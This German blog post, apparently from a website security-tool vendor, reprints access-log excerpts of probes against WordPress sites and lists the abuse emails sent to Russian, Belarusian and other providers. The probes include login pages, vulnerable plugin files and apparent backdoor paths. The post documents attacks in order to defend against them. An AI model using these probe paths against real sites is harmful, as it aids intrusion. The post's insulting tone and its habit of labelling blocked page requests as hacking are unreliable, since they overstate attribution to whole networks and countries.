62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /wp-json/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /wp-json/wp/v2/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/122.0“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /wp-includes/js/wp-emoji-release.min.js HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/118.0.2“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /wp-content/ HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/121.0“
+
62.60.130.210 websiteX.com – – [30/Nov/2025:01:27:21 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/118.0.2“
62.60.130.210 websiteX.com – – [30/Nov/2025:01:27:31 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
62.60.130.210 websiteX.com – – [30/Nov/2025:01:27:31 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.linkedin.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
+
62.60.130.228 websiteX.com – – [30/Nov/2025:04:16:30 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/121.0“
62.60.130.228 websiteX.com – – [30/Nov/2025:04:16:41 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0“
62.60.130.228 websiteX.com – – [30/Nov/2025:04:16:41 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.83“
… und so weiter!!!

NEUES zum 10.11.2025 – Permanente Hacking-Versuche über AS209605 UAB Host Baltic seit dem 16.08.2020!

Da über den Hosting-Provider:

AS209605 UAB Host Baltic
Draugystes str. 19, 51230 Kaunas, LITHUANIA

die seit dem 16.08.202 von uns fast täglich gemeldeten Hacking-Versuche NICHT AUFHÖREN, gibt es nun einen extra Artikel zu diesem Thema:

Hacking-Versuche über AS209605 UAB Host Baltic

Da ist eine Grenze bzgl. Sicherheit und UNSERER Abuse-Meldungen bei weitem überschritten!

DIE PROTOKOLL-AUSZÜGE ANFANG NOVEMBER! HACKER-IDIOTEN ÜBER RUSSLAND UND 1 MAL BELARUS!!!

SOWOHL RUSSLAND ALS AUCH BELARUS SIND KOMPLETT UNERWÜNSCHT UND KOMPLETT GEBLOCKT!

WENN EIN ZUGRIFF MIT STATUSCODE 200, 301 ODER 302 ERSCHEINT, WIRD AUCH DIESES NETZWERK SOFORT GESPERRT!

GESPERRT BEDEUDET, SPERRUNG ÜBER UNSER EIGENES SECURITY-TOOL, DAS VON IMMER MEHR WEBSITE-BESITZERN EINGESETZT WIRD!

Wir bekommen ja regelmäßig automatisch die Logfiles von sehr vielen Websites, auf denen unser Security-Tool eingesetzt wird.

Zum Schutz der Website-Besitzer wurden hier die Domains bewusst in „websiteX“ umbenannt!

HIER NUN DIE PENETRANTEN ZUGRIFFE VON WIRKLICH SEHR DUMMEN HACKER-IDIOTEN! SÄMTLICHE MIT VERANTWORTLICHE PROVIDER BEKAMEN AUCH HIER UNSERE ABUSE-MAIL.

RUSSLAND UND BELARUS – ABSOLUT UNERWÜNSCHT!!!

ABUSE-MELDUNG 1

ABUSE-MAIL AN: abuse@seven-sky.net,abuse@rt.ru,abuse-mailbox@megafon.ru,abuse-b2b@beeline.ru

AS29124 – Iskratelecom JSC
abuse@seven-sky.net
46.31.27.162 websiteX.com – – [04/Nov/2025:16:15:49 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

AS42610 – PJSC Rostelecom – HERE WITH 3 IP´S!!!
abuse@rt.ru
5.228.73.185 websiteX.com – – [04/Nov/2025:16:28:07 +0100] „GET /wp-content/plugins/post-smtp/assets/js/postman-suggest.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
+
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
62.183.16.97 websiteX.com – – [04/Nov/2025:19:24:10 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
62.183.16.97 www.websiteX.com – – [04/Nov/2025:19:24:11 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
62.183.18.79 websiteX.com – – [05/Nov/2025:04:45:37 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
62.183.18.79 www.websiteX.com – – [05/Nov/2025:04:45:38 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

AS215106 – OOO Svyaz‘-Invest Severo-Zapad – MEGAFON.RU – HERE WITH 3 IP´S!!!
abuse-mailbox@megafon.ru
81.23.13.100 websiteX.com – – [04/Nov/2025:20:20:12 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 OPR/121.0.0.0“
+
188.170.86.21 websiteX.com – – [05/Nov/2025:04:45:27 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
62.64.18.76 websiteX.com – – [05/Nov/2025:13:05:45 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0“
62.64.18.76 www.websiteX.com – – [05/Nov/2025:13:05:46 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0“

AS8402 – PJSC „Vimpelcom“
abuse-b2b@beeline.ru
95.24.72.196 websiteX.com – – [04/Nov/2025:20:21:04 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“

ABUSE-MELDUNG 2

ABUSE-MAIL AN: abuse@spd-mgts.ru,abuse@comfortel.pro,abuse@lir.ae,abuse@mtu.ru

AS25513 – PJSC Moscow city telephone network
abuse@spd-mgts.ru
46.138.224.248 websiteX.com – – [05/Nov/2025:02:55:37 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 YaBrowser/25.8.0.0 Safari/537.36“

AS204272 – ASARTA LLC
abuse@comfortel.pro
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
194.190.197.176 websiteX.com – – [05/Nov/2025:06:47:00 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

AS216341 – OPTIMA LLC – Prime LLC – HERE WITH 3 IP´S!
abuse@lir.ae
Here are we have a 403 but when it´s a 200, mostly this idiots start to try to hacking!
185.39.19.49 www.websiteX.com – – [05/Nov/2025:06:45:00 +0100] „GET / HTTP/1.0“ 403 – „https://www.websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.49 www.websiteX.com – – [05/Nov/2025:06:45:00 +0100] „GET / HTTP/1.0“ 403 – „https://www.websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
185.39.19.34 www.websiteX.com – – [06/Nov/2025:00:17:20 +0100] „GET / HTTP/1.0“ 403 – „https://www.websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0“
185.39.19.34 www.websiteX.com – – [06/Nov/2025:00:17:20 +0100] „GET / HTTP/1.0“ 403 – „https://www.websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0“
+
185.39.19.49 websiteX.com – – [05/Nov/2025:05:24:16 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.49 websiteX.com – – [05/Nov/2025:05:24:16 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.49 websiteX.com – – [05/Nov/2025:05:24:16 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.49 websiteX.com – – [05/Nov/2025:05:24:16 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

AS42322 – MTS PJSC
abuse@mtu.ru
37.19.76.215 websiteX.com – – [04/Nov/2025:16:44:34 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

ABUSE-MELDUNG 3

ABUSE-MAIL AN: abuse@minsk.beltelecom.by,mt.spb@inbox.ru,tevs@lan-servis.ru,info@galeonllc.ru

AS6697 – Republican Unitary Telecommunication Enterprise Beltelecom – BELARUS IS ALSO VERY UNWANTED – COMPLETE BLOCKED
abuse@minsk.beltelecom.by
178.124.185.188 websiteX.com – – [04/Nov/2025:16:48:05 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“

AS205553 – LTD Magistral_Telecom
mt.spb@inbox.ru
5.188.167.225 websiteX.com – – [04/Nov/2025:18:10:42 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“

AS60931 – LAN-Service Ltd.
tevs@lan-servis.ru
Here are we have a 403 but when it´s a 200, mostly this idiots start to try to hacking!
46.8.91.14 www.websiteX.com – – [04/Nov/2025:18:47:06 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36“

AS50340 – JSC Selectel
info@galeonllc.ru
Here are we have a 403 but when it´s a 200, mostly this idiots start to try to hacking!
45.89.70.30 websiteX.com – – [05/Nov/2025:12:55:00 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 websiteX.com – – [05/Nov/2025:12:55:00 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 websiteX.com – – [05/Nov/2025:12:55:01 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 websiteX.com – – [05/Nov/2025:12:55:01 +0100] „GET / HTTP/1.0“ 403 – „http://websiteX.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

ABUSE-MELDUNG 4

ABUSE-MAIL AN: abuse@enet.ru,dagline.net@mail.ru,abuse@lovit.ru,noc@itmh.ru

AS8774 – OOO Kompaniya Etype
abuse@enet.ru
109.237.9.253 websiteX.com – – [04/Nov/2025:23:38:41 +0100] „GET /tiny.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“

AS203695 – Saypudinov Ayatula
dagline.net@mail.ru
46.8.246.220 websiteX.com – – [04/Nov/2025:23:38:44 +0100] „GET /tiny.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0“

AS41275 – Lovitel LLC
abuse@lovit.ru
5.35.113.144 websiteX.com – – [05/Nov/2025:00:56:37 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0“

AS12668 – LLC „KomTehCentr“
noc@itmh.ru
185.4.205.150 websiteX.com – – [05/Nov/2025:01:09:48 +0100] „GET /wp-content/plugins/post-smtp/assets/js/postman-suggest.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

ABUSE-MELDUNG 5

ABUSE-MAIL AN: abuse@domru.ru,abuse@di-di.ru,lskripka@sevstar.net,abuse@kaspersky.com

AS56420 – JSC ER-Telecom Holding, AS31363 – JSC ER-Telecom Holding – HERE WITH 2 IP´S!!!
abuse@domru.ru
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
176.212.177.28 websiteX.com – – [05/Nov/2025:01:24:34 +0100] „GET /index.php?option=com_user&view=register HTTP/1.0“ 302 – „-“ „-“
+
5.16.136.160 websiteX.com – – [05/Nov/2025:09:47:45 +0100] „GET /tiny.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36“
+
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
78.139.227.105 websiteX.com – – [05/Nov/2025:10:24:05 +0100] „GET /wp-content/plugins/post-smtp/assets/js/postman-suggest.js HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0“

AS51200 – LLC Digital Dialogue-Nets – HERE WITH 2 IP´S!!!
abuse@di-di.ru
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
194.85.210.58 websiteX.com – – [05/Nov/2025:02:09:56 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
194.85.210.58 www.websiteX.com – – [05/Nov/2025:02:09:58 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
+
THIS NETWORK IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
194.85.210.42 websiteX.com – – [05/Nov/2025:08:56:15 +0100] „GET /tiny.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15“

AS35816 – Lancom Ltd.
lskripka@sevstar.net
78.30.201.193 websiteX.com – – [05/Nov/2025:13:19:51 +0100] „GET /wp-content/plugins/post-smtp/assets/js/postman-suggest.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36“

AS200107 – Kaspersky Lab – HERE WITH 2 IP´S!
abuse@kaspersky.com
77.74.177.118 websiteX.de – – [06/Nov/2025:03:59:23 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36“
93.159.230.85 www.websiteX.de – – [06/Nov/2025:03:59:23 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36“
77.74.177.114 websiteX.de – – [06/Nov/2025:03:59:23 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36“
93.159.230.85 www.websiteX.de – – [06/Nov/2025:03:59:23 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36“

ABUSE-MELDUNG 6

ABUSE-MAIL AN: noc@natanet.ru,abuse@citylink.pro,efr-ivan@yandex.ru,noc@almatel.ru

AS200513 – Service Terminal Media LLC
noc@natanet.ru
146.19.27.141 websiteX.com – – [05/Nov/2025:05:58:20 +0100] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

AS47236 – CityLink Ltd
abuse@citylink.pro
94.140.245.68 websiteX.com – – [05/Nov/2025:08:55:59 +0100] „GET /tiny.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36“

AS198619 – IE Efremov Aleksej Alekseevich
efr-ivan@yandex.ru
109.248.172.163 websiteX.com – – [05/Nov/2025:10:07:57 +0100] „GET /wp-content/plugins/king-addons/freemius/assets/css/customizer.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

AS8905 – Digit One LLC
noc@almatel.ru
91.188.163.110 websiteX.com – – [05/Nov/2025:11:55:55 +0100] „GET /wp-content/plugins/post-smtp/assets/js/postman-suggest.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

Schauen wir nun mal, welcher PROVIDER WIRKLICH VERANTWORTUNGSBEWUSST REAGIERT!

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für all diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Hier schicken wir nun ebenfalls ABUSE-MAILS an die mit verantwortlichen Provider! Seriöse Provider reagieren auch schon positiv darauf! Die uns eh bekannten fragwürdigen und/oder gar unseriösen Provider interessieren uns eh nicht mehr denn dessen NETZWERKE sind mittl. komplett gesperrt!

Es ist wirklich immer wieder sehr amüsant, was für Idioten man unter diesen Möchtegern-Hackern erlebt. Teilweise kann man echt nur noch lachen, wie dumm da so manche Amateure und Scriptkiddies vorgehen.

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Übrigens, da auch immer wieder für uns zwielichtige Provider auftaucht, hier mal eine Tabelle der Provider dazu. Es spiegelt Erfahrungen wider, aufgrund der erfolgreiche Abuse-Meldungen bis hin zu gewissen ignoranten Provider!

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll Oktober 2025

Das Hacker Protokoll Oktober 2025

Dieses Hacker Protokoll Oktober 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll Oktober 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom Oktober. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

DIE PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom WOCHENENDE AB 17. OKTOBER 25!

Wie immer auch dieses Wochenende mal wieder unzählige dumme Hacking-Versuche, beginnend ab dem Freitag-Nachmittag, 17. Oktober 25.

WIR HABEN UNS WIEDER SEHR AMÜSIERT, ÜBER DIE VIELEN ARMSEELIGEN UND SEHR DUMMEN HACKER-IDIOTEN!

Speziell beim 403, die kapieren es einfach nicht… naja… sind wohl überwiegend dumme SCRIPT KIDDIES!!!

Hier ein paar Auszüge dazu, die Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG an die MIT VERANTWORTLICHEN PROVIDER gingen heute am Montag-Vormittag and die mit verantwortlichen Provider raus:

ABUSE-MAIL NR. 1 – WEEKEND!

abuse@bezeqint.net, abuse-mailbox@megafon.ru,admin@ecotelecom.ru

AS8551 – Bezeq International Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
Here are we have a 403 but when it´s a 200, this idiots start to try to hacking!
82.80.249.211 website*x.com – – [17/Oct/2025:19:57:28 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36“
82.80.249.134 website*x.com – – [17/Oct/2025:19:57:29 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1“
82.80.249.134 website*x.com – – [17/Oct/2025:19:57:29 +0200] „GET / HTTP/1.0“ 403 – „-“ „-“
82.80.249.134 website*x.com – – [17/Oct/2025:19:57:35 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36“
82.80.249.134 website*x.com – – [17/Oct/2025:19:57:35 +0200] „GET / HTTP/1.0“ 403 – „-“ „-“

AS25159 – PJSC MegaFon – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
91.205.168.166 website*x.com – – [17/Oct/2025:21:52:47 +0200] „GET /wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0“

AS50473 – Altagen JSC – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.26.28.191 website*x.com – – [17/Oct/2025:22:21:04 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 2 – WEEKEND!

abuse@lir.ae,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@netmax.com.tr

AS216341 – OPTIMA LLC – HERE WITH 3 IP´S!!! – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WE HAVE A 403 BUT WHEN IT´S A 200, THIS IDIOTS START TO TRY TO HACKING!
185.39.19.43 website*x.com – – [17/Oct/2025:23:20:21 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
